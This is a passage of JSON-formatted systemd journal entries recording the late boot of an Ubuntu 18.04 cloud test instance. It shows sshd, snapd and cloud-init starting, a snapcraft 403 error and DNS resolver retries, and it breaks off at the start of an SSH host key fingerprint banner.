"93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819300793" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33f;b=e2b08827b5804427b422c10c84f1567e;m=2af6720;t=5bd16df72e686;x=75277391dc9d1904", "__REALTIME_TIMESTAMP" : "1615280819332742", "__MONOTONIC_TIMESTAMP" : "45049632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:338: started snapd/2.40+18.04 (series 16; classic) ubuntu/18.04 (amd64) linux/4.15.0-60-generic." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=340;b=e2b08827b5804427b422c10c84f1567e;m=2b00b96;t=5bd16df738afe;x=bca15ef339dacb2e", "__REALTIME_TIMESTAMP" : "1615280819374846", "__MONOTONIC_TIMESTAMP" : "45091734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "MESSAGE" : "Server listening on 0.0.0.0 port 22.", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819374819" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=341;b=e2b08827b5804427b422c10c84f1567e;m=2b00d9c;t=5bd16df738d03;x=487ff0bcc8930184", "__REALTIME_TIMESTAMP" : "1615280819375363", "__MONOTONIC_TIMESTAMP" : "45092252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Server listening on :: port 22.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375357" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=342;b=e2b08827b5804427b422c10c84f1567e;m=2b019b5;t=5bd16df73991d;x=3fed89be52fad7be", "__REALTIME_TIMESTAMP" : "1615280819378461", "__MONOTONIC_TIMESTAMP" : "45095349", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Started OpenBSD Secure Shell server.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375573" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=343;b=e2b08827b5804427b422c10c84f1567e;m=2b034ae;t=5bd16df73b416;x=c95b0d8e6ae4d6f", "__REALTIME_TIMESTAMP" : "1615280819385366", "__MONOTONIC_TIMESTAMP" : "45102254", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "Started Snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819381660" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=344;b=e2b08827b5804427b422c10c84f1567e;m=2b04403;t=5bd16df73c36b;x=3cba2937f0e3ef5d", "__REALTIME_TIMESTAMP" : "1615280819389291", "__MONOTONIC_TIMESTAMP" : "45106179", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait until snapd is fully seeded...", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819387422" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=345;b=e2b08827b5804427b422c10c84f1567e;m=2b67456;t=5bd16df79f3bd;x=443fb77a1ce2e531", "__REALTIME_TIMESTAMP" : "1615280819794877", "__MONOTONIC_TIMESTAMP" : "45511766", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "stateengine.go:108: state ensure error: cannot sections: got unexpected HTTP status code 403 via GET to \"https://api.snapcraft.io/api/v1/snaps/sections\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=346;b=e2b08827b5804427b422c10c84f1567e;m=2b8db68;t=5bd16df7c5acf;x=c5ecd1f1656c7b65", "__REALTIME_TIMESTAMP" : "1615280819952335", "__MONOTONIC_TIMESTAMP" : "45669224", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "MESSAGE" : "Started Wait until snapd is fully seeded.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819949158" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=347;b=e2b08827b5804427b422c10c84f1567e;m=2b8ec71;t=5bd16df7c6bd8;x=1551beb68721512d", "__REALTIME_TIMESTAMP" : "1615280819956696", "__MONOTONIC_TIMESTAMP" : "45673585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Apply the settings specified in cloud-config...", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819956688" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=348;b=e2b08827b5804427b422c10c84f1567e;m=2b91065;t=5bd16df7c8fcc;x=959a8e1f960992fa", "__REALTIME_TIMESTAMP" : "1615280819965900", "__MONOTONIC_TIMESTAMP" : "45682789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Multi-User System.", "UNIT" : "multi-user.target", "INVOCATION_ID" : "8176e1f32136427eaa06e0cafe7e88f0", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819963561" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=349;b=e2b08827b5804427b422c10c84f1567e;m=2b9288d;t=5bd16df7ca7f4;x=dad6cb90a3b3aa08", "__REALTIME_TIMESTAMP" : "1615280819972084", "__MONOTONIC_TIMESTAMP" : "45688973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Graphical Interface.", "UNIT" : "graphical.target", "INVOCATION_ID" : "7b20e5aea4164961a1a8bc0fe70f2e67", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819969962" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34a;b=e2b08827b5804427b422c10c84f1567e;m=2b94255;t=5bd16df7cc1bc;x=a1e8a6d119c9cf1", "__REALTIME_TIMESTAMP" : "1615280819978684", "__MONOTONIC_TIMESTAMP" : "45695573", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Update UTMP about System Runlevel Changes...", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819976442" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34b;b=e2b08827b5804427b422c10c84f1567e;m=2b982e9;t=5bd16df7d0251;x=653948edf2957aa5", "__REALTIME_TIMESTAMP" : "1615280819995217", "__MONOTONIC_TIMESTAMP" : "45712105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "MESSAGE" : "Started Update UTMP about System Runlevel Changes.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819992743" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34c;b=e2b08827b5804427b422c10c84f1567e;m=2d159d0;t=5bd16df94d937;x=6afd60d65973aa91", "__REALTIME_TIMESTAMP" : "1615280821557559", "__MONOTONIC_TIMESTAMP" : "47274448", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557349" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34d;b=e2b08827b5804427b422c10c84f1567e;m=2d15c93;t=5bd16df94dbfb;x=247ae29ca751753b", "__REALTIME_TIMESTAMP" : "1615280821558267", "__MONOTONIC_TIMESTAMP" : "47275155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557482" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34e;b=e2b08827b5804427b422c10c84f1567e;m=2d7b806;t=5bd16df9b376e;x=2294cfd776b550f5", "__REALTIME_TIMESTAMP" : "1615280821974894", "__MONOTONIC_TIMESTAMP" : "47691782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "946d9c088eee49f399e2b8f8748cb430", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:config' at Tue, 09 Mar 2021 09:07:00 +0000. Up 46.18 seconds.", "_PID" : "967", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=config", "_SYSTEMD_CGROUP" : "/system.slice/cloud-config.service", "_SYSTEMD_UNIT" : "cloud-config.service", "_SYSTEMD_INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34f;b=e2b08827b5804427b422c10c84f1567e;m=2d8b7a5;t=5bd16df9c370d;x=293794bdaf1cd8d8", "__REALTIME_TIMESTAMP" : "1615280822040333", "__MONOTONIC_TIMESTAMP" : "47757221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "MESSAGE" : "Started Apply the settings specified in cloud-config.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822037495" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=350;b=e2b08827b5804427b422c10c84f1567e;m=2d8c1e5;t=5bd16df9c414c;x=1d7ee7480e09a411", "__REALTIME_TIMESTAMP" : "1615280822042956", "__MONOTONIC_TIMESTAMP" : "47759845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Execute cloud user/final scripts...", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822042948" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=351;b=e2b08827b5804427b422c10c84f1567e;m=2e2257e;t=5bd16dfa5a4e2;x=f8cfeef9f82611a5", "__REALTIME_TIMESTAMP" : "1615280822658274", "__MONOTONIC_TIMESTAMP" : "48375166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "MESSAGE" : "", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822658219" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=352;b=e2b08827b5804427b422c10c84f1567e;m=2e22d66;t=5bd16dfa5acce;x=924240d1c537a496", "__REALTIME_TIMESTAMP" : "1615280822660302", "__MONOTONIC_TIMESTAMP" : "48377190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660295" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=353;b=e2b08827b5804427b422c10c84f1567e;m=2e22e3f;t=5bd16dfa5ada6;x=98532139d824c042", "__REALTIME_TIMESTAMP" : "1615280822660518", "__MONOTONIC_TIMESTAMP" : "48377407", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----BEGIN SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660512" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=354;b=e2b08827b5804427b422c10c84f1567e;m=2e23704;t=5bd16dfa5b66c;x=9e6e028ffde5bdfd", "__REALTIME_TIMESTAMP" : "1615280822662764", "__MONOTONIC_TIMESTAMP" : "48379652", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", 